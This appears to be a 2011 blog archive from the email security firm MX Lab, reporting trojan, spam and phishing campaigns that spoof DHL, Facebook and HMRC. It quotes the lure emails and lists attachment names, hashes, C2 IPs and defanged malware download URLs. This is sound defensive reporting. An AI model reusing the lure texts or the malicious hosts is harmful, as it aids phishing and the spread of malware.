Trojan present in emails with subject “DHL Delivery Services notification”

April 29, 2011 3 Comments

MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “DHL Delivery Services notification #98068″ (numbers change with each message).

The email is send from the spoofed address  ”DHL Support” and has the following body:

Dear customer!

The parcel was sent your home address! And it will arrive within 7
business day!

More information and the traching number are attached in document
below!

Thank you.
Best regards.

2011 DHL International GmbH. All rights reserved!

The attached ZIP file has the name document.zip and contains the 20 kB large file document.exe.

The trojan is known as Gen:Variant.Bredo.21 (BitDefender), W32/Oficla.ER (Commtouch), TrojanDownloader:Win32/Chepvil.K (Microsoft).

At the time of writing, only 9 of the 42 AV engines did detect the trojan at Virus Total.

Virus Total permalink and MD5: ef8ba58d9e4109b317727d72c6affe87.

Filed under Malware, Viruses Tagged with , , ,

“Spam from your Facebook account” messages contains trojan

April 28, 2011 3 Comments

MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with tone of the following subjects:

Spam from your account
Spam from your Facebook account
Your password has been changed

The email is from “Facebook Abuse Department” containing a spoofed email address in the format ***@facebook.com, where the part before the @-sign contains different names starting with a capital, and has the following body:

Dear client

Spam is sent from your FaceBook account.

Your password has been changed for safety.

Information regarding your account and a new password is attached to the letter.
Read this information thoroughly and change the password to complicated one.

Please do not reply to this email, it’s automatic mail notification!

Thank you for using our services.
FaceBook Service.

The attached ZIP file has the name Attached_SecurityCode08592.zip, where the number is choosen randomly, and contains the 33 kB large file Attached_SecurityCode.exe.

The trojan is known as W32/Trojan2.NNGG (Commtouch) and Troj/DwnLdr-IZR (Sophos). This trojan will install itself on the infected computer and has a build in SMTP engine for spreading its payload further by email.

The following files will be created:

%Temp%\_check32.bat
%Windir%\s32.txt
%System%\aspimgr.exe
%System%\document.doc
%Windir%\ws386.ini

Several Windows registry changes will be exectued and the trojan can establish connection with the following IPs:

Remote Host Port Number
148.223.242.243 25
148.244.121.6 25
161.132.8.44 25
174.120.139.92 25
200.157.233.13 25
200.57.129.65 25
200.57.129.66 25
204.200.167.219 25
207.193.205.1 25
216.200.145.36 25
194.247.183.170 80
91.207.178.169 80

Data can be obtained from following URLs:

    • hxxp://cl63amgstart.ru:80/board.php
    • hxxp://campaigncommunications.ru/connect/load.php?file=document
    • hxxp://campaigncommunications.ru/connect/load.php?file=2
    • hxxp://campaigncommunications.ru/connect/load.php?file=3
    • hxxp://campaigncommunications.ru/connect/load.php?file=4
    • hxxp://campaigncommunications.ru/connect/load.php?file=5
    • hxxp://campaigncommunications.ru/connect/load.php?file=6
    • hxxp://campaigncommunications.ru/connect/load.php?file=7
    • hxxp://campaigncommunications.ru/connect/load.php?file=8
    • hxxp://campaigncommunications.ru/connect/load.php?file=9
    • hxxp://campaigncommunications.ru/connect/load.php?file=uploader
    • hxxp://campaigncommunications.ru/connect/load.php?file=0
    • hxxp://campaigncommunications.ru/connect/load.php?file=0&luck=1
    • hxxp://campaigncommunications.ru/connect/load.php?file=1
    • hxxp://campaigncommunications.ru/connect/load.php?file=1&luck=1

At the time of writing, only 2 of the 41 AV engines did detect the trojan at Virus Total.

Virus Total permalink and MD5: 72a45688ba03a9bfd3b3755c33843dcd.

Filed under Malware, Viruses Tagged with , , , ,

“Facebook Support. Your password has been changed!” contains trojan

April 11, 2011 1 Comment

MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “Facebook Support. Your password has been changed! ID09687″. Note that the number may change with each email.

The email is send from the spoofed addresses:

account@facebook.com
manager@facebook.com

The message has the following body:

Dear user of FaceBook.

Your password is not safe!
To secure your account the password has been changed automatically.

Attached document contains a new password to your account and detailed information about new security measures.

Thank you for your attention,
Your Facebook

The attached ZIP file has the name New_Password_IN04393.zip, note that the number at the end will change, and contains the 33 kB large file New_Password.exe.

The trojan is known as Gen:Heur.VIZ.2 (BitDefender), Mal/FakeAV-JX (Sophos), Trojan.Generic.Bredolab-2 (ClamAV).

The following files will be created:

%System%\document.doc

Several Windows registry changes will be exectued and the trojan can establish connection with the IP 193.106.34.20 on port 80.

Data can be obtained from following URLs:

  • hxxp://profmiale.ru/TGQW4nHJOS/document.doc
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=8
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=9
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=uploader
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=grabbers
  • hxxp://profmiale.ru/TGQW4nHJOS/grabbers.php
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=0
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=1
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=2
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=3
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=4
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=5
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=6
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=7

At the time of writing, only 6 of the 42 AV engines did detect the trojan at Virus Total.

Virus Total permalink and MD5: ecc2d442886b7296b5bd7eaeaae0bcea.

Filed under Malware, Viruses Tagged with , , , , ,

2 DNS Name Servers of DNS.BE experienced unusual high workload

April 5, 2011 1 Comment

DNS.BE, the Belgian organization that manages all registrations of domainnames under the .be TLD,  reported that the DNS name servers did get an unusual high workload, up to 6 times more queries than average, resulting in 2 servers that where hardly available during 4 hour on last Sunday. The other 47 name servers were perfectly able to back-up services and surfers to .be sites did not notice any delays.

A botnet, responsible for sending out spam, created many DNS requests to the name servers of DNS.BE for the MX records of domains. In normal cases, these requests are not made to DNS.BE but to the domain name holders’ name servers. When requesting the MX records directly at the top level name servers, the requester will get a response back that the query fails.

Organisation like the CERT (Belgian National Computer Emergency Response Team) and FCCU (Federal Computer Crime Unit) where informed about the “attack” – or abuse – on the DNS name servers.

The investigations shows that botherders did not configure the botnet like it should be and it was not a direct attack to the DNS.BE. Most traffic came from Eastern Europe and South-America.

More reading:

DNS.BE: http://www.dns.be/en/home.php?n=461
Datanews (in Dutch): read article
De Standaard (in Dutch): read article on Monday
De Standaard (in Dutch): read article on Tuesday

Filed under Various Tagged with , , , ,

Receive a bonus of 2000 € – not everything is what it looks like

April 3, 2011 Leave a Comment

MX Lab, http://www.mxlab.eu, intercept a large spam campaign what in fact appears to be an SMS scam system.

Email messages are sent from no-reply-xxx@finance-magazine.eu, where the XXX stands for random numbers. The domain finance-magazine.eu is from the The European CFO Magazine.

Many different subjects in the French language are being used to get some attraction:

Une offre qou vous ne pouvez pas refuser
Une opportunite unique d’une vie
Faire de l’argent n’a jamais ete aussi facile!
Etes-vous interesse ?

This is the email content:

The embedded URLs directs visitors to hxxp://berborso.com/c/8D1DB23B.

On this landing page you will need to fill in your details including your mobile phone number.

When your details are submitted, you’ll receive an SMS with an activation code. This code needs to be filled in again on this webform together with some additional details.

I haven’t filled in my real phone number but I’m pretty sure that this is a complete SMS scam. I wouldn’t be suprised if you receive more SMS messages later on that are credited on your phone bill later on.

This domain name is registered in the Ukraine:

Service Provided By: Center of Ukrainian Internet Names
Website: http://www.ukrnames.com
Contact: +380.577626123

Domain Name: BERBORSO.COM

Creation Date: 28-Mar-2011
Modification Date: 28-Mar-2011
Expiration Date: 28-Mar-2012

Domain servers in listed order:
ns1.hahray.in
ns2.hahray.in

Registrant:
Son Svan hdgi-domains@gmail.com
WATER STREET 45/54
CHRIST CHURCH, BB17056
BARBADOS
+1.24615566596

Be carefull if you receive offers like this.

Filed under Spam Tagged with , ,

“DHL Express Services” – another trojan in the wild

April 3, 2011 13 Comments

MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “DHL Express Services”

The email is send from the spoofed address “DHL Global” with the email:

supportmop@dhl.com
supportmop1@dhl.com

We expect that more new spoofed email addresses will appear in the format like the examples, based on the previous campaigns, with a number before the @-sign.

The message has the following body:

Dear customer.

The parcel was sent your home address.
And it will arrive within 3 business day.

More information and the tracking number are attached in document below.

Thank you.
© 1994-2011 DHL Express Services, Inc.

The attached ZIP file has the name dhl.zip and contains the 20 kB large file dhl.exe.

The trojan is known as Gen:Variant.Kazy.17907 (Bitdefender), Backdoor:Win32/Hostil.gen!A (Microsoft) or Trj/Sasfis.A (Panda).

The following files will be created:

%CommonAppData%\lpd2lf503886
%AppData%\lpd2lf503886
%Temp%\lpd2lf503886
%Templates%\lpd2lf503886
%AppData%\fip.exe

A new process is created:

fip.exe —> %AppData%\fip.exe

Several Windows registry changes will be exectued and the trojan can establish connection with the following IPs on port 80:

216.155.130.214
46.161.20.66

Data can be obtained from following URLs:

  • hxxp://tazejutyhyfu.com/1017000312
  • hxxp://puskovayaustanovka.ru/pusk2.exe

At the time of writing, only 4 of the 43 AV engines did detect the trojan at Virus Total.

Virus Total permalink and MD5: 87d778169ae14d934b92ce628b5cfde4.

Analysis of the file pusk.exe:

The trojan is known as Gen: Mal/Behav-321 (Sophos), TrojanDropper.Mudrop.ozh (VBA32), FraudTool.Win32.FakeRean.b (v) (VIPRE)

This malware will create the files:

%CommonAppData%\lpd2lf503886
%AppData%\lpd2lf503886
%Temp%\lpd2lf503886
%Templates%\lpd2lf503886

A new process will be created:

jfe.exe —-> %AppData%\jfe.exe

It will modify the Windows registry and the trojan can establish connection 216.155.130.214 op port 80.

it will request data from hxxp://tazejutyhyfu.com/1017000312.

At the time of writing, only 4 of the 43 AV engines did detect the trojan at Virus Total.

Virus Total permalink and MD5: 2ac3a5bb8e7eb81cb306f869207eb69b.

Filed under Malware, Viruses Tagged with , , , ,

Canadian Pharmacy pops up in emails from Facebook with subject “Welcome to Facebook Goods”

April 3, 2011 1 Comment

MX Lab, http://www.mxlab.eu, started to intercept a new spam campaign, since yesterday, by email with the subject “Welcome to Facebook Goods”. These messages are sent from the spoofed email addresses in the format that Facebook is using on the domain facebookmail.com. Some examples:

update+bscts2qxhedj@facebookmail.com
update+6i8mlfxn1svw@facebookmail.com
update+6i8mlfxn1svw@facebookmail.com

This is the body of the email:

Notice that the Facebook looks are used to disguise the real purpose of the message.

4 different URLs are used in each message with the format: http://www.domainhere.tld/s/h/o/p/ that will redirect you to the Canadian Pharmacy at hxxp://midiclxic.ru/.

 

Filed under Spam Tagged with , ,

Download Adobe Reader 10 Alternative scam

April 1, 2011 6 Comments

MX Lab reported earlier on regarding a malicious spam campaign regarding an offer to download and buy PDF Reader/Writer for Windows and Mac in the articles Malicious spam campaign regarding Adobe Acrobat 2010 PDF Reader and VOIP Addons for Skype and Emails offering PDF Reader 2010 lead to unsecure payment site.

MX Lab noticed a new version that will offer the latest PDF Reader. The emails have the subject “Download Adobe Reader 10 Alternative”  with the email address dailynews_dec09@m120.redmediaone.com.

This is the body of the email:

Following the link to the web site will lead us here:

When clicking on the download button we have the following screen that looks very familiar:

Okay, let’s go throught the registration process:

The registration transactions are performed on the domain secure-signupway.com. This domain is know for fraudulent payment processing so your credit card details will end up in the wrong hands.

Now, this is also interesting. The domain from where the message is sent, redmediaone.com, has protected registrant details in the WHOIS.

Registrant:
   redmediaone.com
   c/o Whois Privacy Service
   PO BOX 501610
   San Diego, CA 92150-1610
   US

   Domain Name: REDMEDIAONE.COM

   Administrative Contact, Technical Contact, Zone Contact:
      redmediaone.com
      c/o Whois Privacy Service
      PO BOX 501610
      San Diego, CA 92150-1610
      US
      (619) 393-2111
      whois@emailaddressprotection.com

   Domain created on 18-May-2010
   Domain expires on 17-May-2012
   Last updated on 25-Mar-2011

   Domain servers in listed order:

      NS1.DOMAINDISCOVER.COM
      NS2.DOMAINDISCOVER.COM

In the message is the download URL and an unsubscribe URL present that is handled by http://list.onemediaclick.com/. And also iin this case, the registrant details are protected.

Domain Name: ONEMEDIACLICK.COM
Registrar: MONIKER

Registrant [3559862]:
        Moniker Privacy Services ONEMEDIACLICK.COM@domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US

Administrative Contact [3559862]:
        Moniker Privacy Services ONEMEDIACLICK.COM@domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US
        Phone: +1.9549848445
        Fax:   +1.9549699155

Billing Contact [3559862]:
        Moniker Privacy Services ONEMEDIACLICK.COM@domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US
        Phone: +1.9549848445
        Fax:   +1.9549699155

Technical Contact [3559862]:
        Moniker Privacy Services ONEMEDIACLICK.COM@domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US
        Phone: +1.9549848445
        Fax:   +1.9549699155

Domain servers in listed order:

        NS1.DOMAINSERVICE.COM         208.73.210.41
        NS2.DOMAINSERVICE.COM         208.73.211.42
        NS3.DOMAINSERVICE.COM
        NS4.DOMAINSERVICE.COM

        Record created on:        2011-02-14 12:05:30.0
        Database last updated on: 2011-02-14 12:05:32.93
        Domain Expires on:        2012-02-14 12:05:31.0

The web site of  Onemediaclick:

These guys are, according to the address on the site, located in Switzerland. When trying to contact them through the web form, nothing happens. The <form> tags are not included in the web form when looking at the source. Seems to me that this whole business can not be trusted.

Filed under Phishing, Spam Tagged with , , ,

HM Revenue & Customs phishing emails – continued

April 1, 2011 Leave a Comment

MX Lab, http://www.mxlab.eu, is intercepting tax refund phishing emails with the subject “Please Submit Your Payment Refund″ and an attached HTML webpage. We have reported this earlier on on January 27th, 2011, and this campaign is still running in a modified version.

The emails is send from the spoofed email address srvcs@hmrc.gov.uk, and possible other combinations, and has the following body:

Dear Applicant:

Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the last seven years our calculations show that you have made over payments of GBP 178.25

Due to the high volume of refunds due you must complete the online application, the telephone help line is unable to assist with this application. In oder to process your refund you will need to complete the application form attached to this email.Your refund may take up to 6 weeks to process please make sure you complete the form correctly.

NOTE: If you’ve received an Income Tax ‘repayment’ it will either be following a claim you’ve made or because HM Revenue & Customs (HMRC) has received new information about your taxable income or entitlement to allowances. The refund may come through your tax code or as a payment and could relate to the current tax year or earlier years.

An Income Tax repayment is a refund of tax that you’ve overpaid. So, if you’ve paid too much tax for example through your job or pension this year or in previous years HMRC will send you a repayment. You’ll get the repayment by bank transfer directly to your credit or debit card.

————————————————————–

Copyright 2011, HM Revenue Customs UK All rights reserved.

Attached to the email is an HTML page with the name Refund_Form.htm. Once opened you will have a webform to submit your personal details together with your credit card details.

When looking into the HTML source code we can find that the layout and images are directly taken from the http://www.hmrc.gov.uk/ web site. The form data itself will be directed to hxxp://www.hotel-bergara.com/cgi-bin/mailform.cgi. When submitting data you will be redirected to the HM Revenue & Customs web site. The forms hidden values shows us that the data is sent to govukgov@yahoo.com.

We also have a second example where the email contains an URL to the phishing web site instead of an embedded attachment in the message.

Filed under Phishing Tagged with ,

Follow

Get every new post delivered to your Inbox.

Join 109 other followers